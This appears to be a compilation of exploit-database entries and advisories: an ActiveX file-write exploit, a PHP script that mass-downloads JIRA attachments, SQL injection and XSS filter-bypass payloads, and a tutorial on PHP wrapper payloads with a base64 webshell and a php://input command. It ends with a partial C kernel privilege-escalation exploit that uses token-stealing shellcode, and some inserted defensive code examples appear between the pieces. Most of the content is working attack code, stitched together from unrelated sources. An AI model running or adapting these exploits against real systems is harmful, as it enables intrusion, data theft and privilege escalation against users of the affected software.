source: https://www.securityfocus.com/bid/48483/info
CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target'></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub
</script>
</html>
source: https://www.securityfocus.com/bid/48484/info
Atlassian JIRA is prone to a security bypass vulnerability.
An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application.
<?php
/*If it's https, you MUST specify it in the URL or it won't work.
Try using numbers that you get from your Google results, otherwise
you will get a lot of 404s*/
echo "\n#########################################################
###################
# \n#Attachment downloader by Ignacio Garrido\n#";
if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/
1 12310371#
############################################################################\n";die;}
else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n#\n############################################################################\n";}
$url2 = $argv[1];
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}
if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}
$numero = $argv[2];
for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");
if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);
echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);
}
}
echo "\n#All attachment downloaded correctly!\n";
die;
?>
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421
Release Date:
=============
2015-01-26
Vulnerability Laboratory ID (VL-ID):
====================================
1421
Common Vulnerability Scoring System:
====================================
8.9
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.
Vulnerability Disclosure Timeline:
==================================
2015-01-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The vulnerability allows an attacker to inject SQL commands and compromise the application and the database management system.
The SQL injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers
are able to inject their own SQL commands by manipulating the vulnerable `newsid` value in the `news_view.php` file. A successful attack
requires manipulating a GET request with the vulnerable `newsid` value. The injection is a classic ORDER BY SQL injection that allows
compromise of the web application and the connected database management system. The request method used to inject SQL commands is GET,
and the vulnerability is located on the application side of the service.
The security risk of the SQL injection vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web application user account and no user interaction.
Successful exploitation of the security vulnerability results in compromise of the web application and the database management system.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] News
Vulnerable File(s):
[+] news_view.php
Vulnerable Parameter(s):
[+] newsid
Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.
Dork(s):
allinurl:news_view.php?newsid=
title:Powered By Powered by Mangallam
PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--
Reference(s):
http://localhost:8080/news_view.php
Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by using a prepared statement for the newsid GET request parameter.
Restrict and filter the newsid value and disallow input of special characters. Prevent PHP errors from being displayed by switching error reporting off (the PHP error function called with 0).
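As an added illustration (not part of the advisory and not Mangallam's code), the following Python stand-in shows the string-splicing pattern the advisory describes beside the prepared-statement and input-restriction fix it recommends, using an in-memory SQLite table; the news table schema and the serve() handler are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the CMS news table (not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Release notes")])
    return db


def news_view_vulnerable(db, newsid):
    """The flawed pattern: the GET value is spliced into the SQL text."""
    sql = "SELECT newsid, title FROM news WHERE newsid = '" + newsid + "'"
    return db.execute(sql).fetchall()


def parse_newsid(raw):
    """Input restriction from the fix section: only a decimal integer is accepted."""
    if not raw.isdigit():
        raise ValueError("newsid must be a decimal integer")
    return int(raw)


def news_view_fixed(db, raw):
    """Prepared statement: the value is bound as data and never parsed as SQL."""
    newsid = parse_newsid(raw)
    sql = "SELECT newsid, title FROM news WHERE newsid = ?"
    return db.execute(sql, (newsid,)).fetchall()


def serve(db, raw, hardened):
    """Simulated HTTP handler: returns the status code and the body the client sees."""
    try:
        rows = news_view_fixed(db, raw) if hardened else news_view_vulnerable(db, raw)
        return ("200", rows)
    except ValueError as exc:
        return ("400", str(exc))          # rejected before the database is touched
    except sqlite3.Error as exc:
        # Vulnerable path: this raw engine error is exactly what the advisory says
        # must not be displayed, because it confirms the injection point to the client.
        return ("500", str(exc))


if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "-1'"):
        print(raw, "vulnerable ->", serve(db, raw, hardened=False))
        print(raw, "fixed      ->", serve(db, raw, hardened=True))
```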
Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.
Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service and execute malicious script code.
The Barracuda filter blocks, for example, standard iframes, scripts and other invalid code context. The cloud service has its own exception handling
to parse or encode maliciously injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked. In the next step the attacker splits the request (%20%20%20)
and injects at the end an onload frame pointing to an external malicious source. The second iframe with the onload alert executes the script code, because
the validation encoded only the first script code tag. The second script code tag bypasses the appliance filter mechanism and executes in the web context
of the affected modules. The secure validation does not recognize a split request, which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the CVSS (Common Vulnerability Scoring System) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low-privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and by remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by secure validation of the full message input body of any input or request method.
Ensure that the validation does not stop after encoding the first injected script tag when an empty character (whitespace) follows. Filter all web context
that passes through the request procedure and parse it separately to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available from Barracuda Labs and Customer Service.
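As an added example (not Barracuda's code and not part of the advisory), the Python below models the first-tag-only behaviour described above beside the full-body encoding the fix section asks for, and runs both over the PoC string from this advisory; the filter internals are assumptions made to show why stopping after the first recognised tag leaves the split remainder live.

```python
import html
import re
from urllib.parse import unquote

# A single complete tag; the narrow kind of pattern the weak filter keys on.
FIRST_TAG_RE = re.compile(r"<[^>]*>")

# The advisory's PoC string, reproduced from the page (percent-encoded spaces included).
PAGE_POC = '<iframe src=a>%20%20%20%20\\"><iframe src=http://vuln-lab.com onload=alert("VL") <'


def weak_filter(value):
    """Models the flawed behaviour the advisory describes.

    The filter decodes the field, HTML-encodes the first tag it recognises and lets
    the remainder of the field through unchanged, so anything after the split survives.
    """
    decoded = unquote(value)
    m = FIRST_TAG_RE.search(decoded)
    if not m:
        return decoded
    return decoded[:m.start()] + html.escape(m.group(0)) + decoded[m.end():]


def full_encode(value):
    """The fix the advisory asks for: treat the whole body as data.

    Decode once, then encode every HTML-significant character over the entire value
    (quotes included) instead of stopping after the first recognised tag.
    """
    return html.escape(unquote(value), quote=True)


def contains_live_tag(rendered):
    """Output-side check: would a browser still see an iframe or script opener?"""
    return re.search(r"<\s*(iframe|script)\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, fn in (("weak_filter", weak_filter), ("full_encode", full_encode)):
        out = fn(PAGE_POC)
        print(f"{name}: live tag remains = {contains_live_tag(out)}\n  {out}")
```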
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
When dealing with PHP files, there is a concept called PHP Wrappers. A wrapper is a kind of envelope that tells the stream (sequence, request, data input/output) how to behave.
This PHP feature is very useful in attacks such as LFI and XXE; thanks to it, we can gain some advantages that we otherwise would not have.
The wrapper concept will become clearer as we go through it now.
Index:
- php://filter
- zip://
- data://
- php://input
- expect://
- References
php://filter
The filter wrapper lets us encode the file we specify. This is very useful, since it lets us read PHP files that the browser would otherwise simply interpret directly.
For example, we have the following file:
As we can see, it has a password in a comment. But if we access the file from the web:
We only see the output of the interpreted code 😥. However, using the filter wrapper, we will be able to read the whole PHP file.
To test the wrapper, I created an LFI in an index.php file. So, in this LFI, the payload we enter to use the wrapper and read the secret.php file is the following:
- php://filter/convert.base64-encode/resource=<file>
This way we are reading the secret.php file, but in base64, so if we decode this output:
We get the whole file. A curious detail about wrappers is that we can chain several of them using a pipe | or a slash /. Example:
And we get exactly the same result.
Besides base64-encoding, we can apply ROT13 with the following string:
- php://filter/read=string.rot13/resource=<file>
Although this one in particular does not work for reading PHP files:
But it does apply to other types of files:
In conclusion, regarding this wrapper, we have the following two payloads:
- php://filter/convert.base64-encode/resource=<file>
- php://filter/read=string.rot13/resource=<file>
zip://
The zip wrapper lets us execute a PHP file that we have put inside a zip archive. The zip archive does not even need the zip extension; it can have any extension.
This wrapper is not installed by default, but it can be installed with the following command:
- sudo apt install phpX.Y-zip
Where X and Y are the PHP version we have installed or to which we want to add this feature.
Example of running a webshell through this wrapper:
Payload:
- zip://<zip file>%23<php file>
In <zip file>, if it were not in the current directory, we would specify the directory where the file is located, and that's it.
Note: if the PHP file were a webshell or expected some parameter, it would be appended with an ampersand, as we see in the following image.
And even after changing the zip extension, it keeps working:
data://
The data wrapper lets us include external data, including PHP code. This wrapper only works if the allow_url_include option is enabled in the PHP configuration (the option equivalent to a Remote File Inclusion).
Executing PHP code with this wrapper is quite simple; we can do it in two ways:
- In plain text
- In base64
In plain text, we would simply have to use the following payload:
- data:text/plain,<PHP code>
Example:
To do it using base64, we would simply have to encode the PHP code:
And place it in the wrapper like so:
- data://text/plain;base64,<PHP code in base64>
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
This way, since we are defining a parameter to execute commands, the payload to run, for example, the id command would be:
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id
Example:
php://input
This wrapper is similar to the one above (data). It can be used to include PHP code. Its requirement, just like the data wrapper, is that the allow_url_include option in the PHP configuration must be enabled.
With that done, commands could be executed by sending the PHP code in the body of a POST request. Example:
- curl -s -X POST -d '<PHP code>' 'http://example.com/index.php?file=php://input'
In this case, we can see the command's output in the response.
expect://
The expect wrapper is not installed by default, but if it is, it allows commands to be executed directly as follows:
- expect://<command>
This happens because this wrapper gives access to a PTY (pseudo-teletype), which in UNIX basically refers to a terminal. It gives access to STDIN, STDOUT and STDERR.
PHP Wrappers Conclusion
As we have seen, this PHP feature is very useful on many occasions, since it can help us achieve things we otherwise could not. It is quite useful to make use of them when facing vulnerabilities such as Local File Inclusion (LFI) or XML External Entity (XXE), or really in any case where we see we have the ability to use them.
References
- What do pty and tty mean?
- expect://
- File Inclusion / Directory Traversal – HackTheBox Academy
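As an added defender-side example (not from the post above), the Python below scans web-server access log lines for the wrapper schemes the post walks through (php://filter, zip://, data:, php://input, expect://) in any query parameter, decoding percent-encoding first so the %23 form of zip:// is recognised; the log lines are constructed samples for a page served as index.php?file=..., and the combined-log layout is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Stream wrappers covered in the post. php://filter and php://input share the php://
# scheme; "data:" matches both the data:text/plain and data://text/plain forms.
WRAPPER_RE = re.compile(r"^\s*(php://filter|php://input|zip://|data:|expect://)",
                        re.IGNORECASE)

# Apache combined-log shape: client, identity, user, [timestamp], "request", status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines modelled on the payload shapes in the post; not real logs.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jan/2015:10:00:01 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=secret.php HTTP/1.1" 200 512
10.0.0.5 - - [26/Jan/2015:10:00:02 +0000] "GET /index.php?file=zip://shell.jpg%23shell.php&cmd=id HTTP/1.1" 200 100
10.0.0.5 - - [26/Jan/2015:10:00:03 +0000] "GET /index.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id HTTP/1.1" 200 90
10.0.0.5 - - [26/Jan/2015:10:00:04 +0000] "POST /index.php?file=php://input HTTP/1.1" 200 80
10.0.0.5 - - [26/Jan/2015:10:00:05 +0000] "GET /index.php?file=expect://id HTTP/1.1" 500 0
10.0.0.9 - - [26/Jan/2015:10:00:06 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 2048
"""


def query_params(uri):
    """Split the query string on '&' only and percent-decode each side.

    Splitting by hand instead of using parse_qs keeps the ';' inside
    data://text/plain;base64,... intact (older Pythons also split on ';').
    """
    params = []
    for pair in urlsplit(uri).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote(key), unquote(value)))
    return params


def scan_log(text):
    """Return one finding per query parameter whose decoded value starts with a wrapper."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in query_params(m.group("uri")):
            w = WRAPPER_RE.match(value)
            if not w:
                continue
            wrapper = w.group(1).lower()
            finding = {
                "ip": m.group("ip"),
                "method": m.group("method"),
                "param": key,
                "wrapper": wrapper,
                "status": int(m.group("status")),
                "detail": "",
            }
            # zip:// names the file inside the archive after '#' (sent as %23 on the wire).
            if wrapper == "zip://" and "#" in value:
                finding["detail"] = value.split("#", 1)[1]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['param']}={f['wrapper']} "
              f"status={f['status']} {f['detail']}")
```

A 200 on a php://filter or data: request is the line to chase first: php://input and data: only work when allow_url_include is on, so a hit there also says something about the server's configuration.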
Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt
Title : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9598
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
A user with limited privileges could gain access to certain
functionality that is available only to administrative users. For
example, users with Guest privileges can see the subjects of the
tickets, stats and other information related to tickets.
Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
Timeline
======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit; had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below is from Windows XP, in the IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <conio.h> // getch()
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // Windows XP
if (minVersion == 1 && majVersion == 6) v = 2; // Windows 7
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
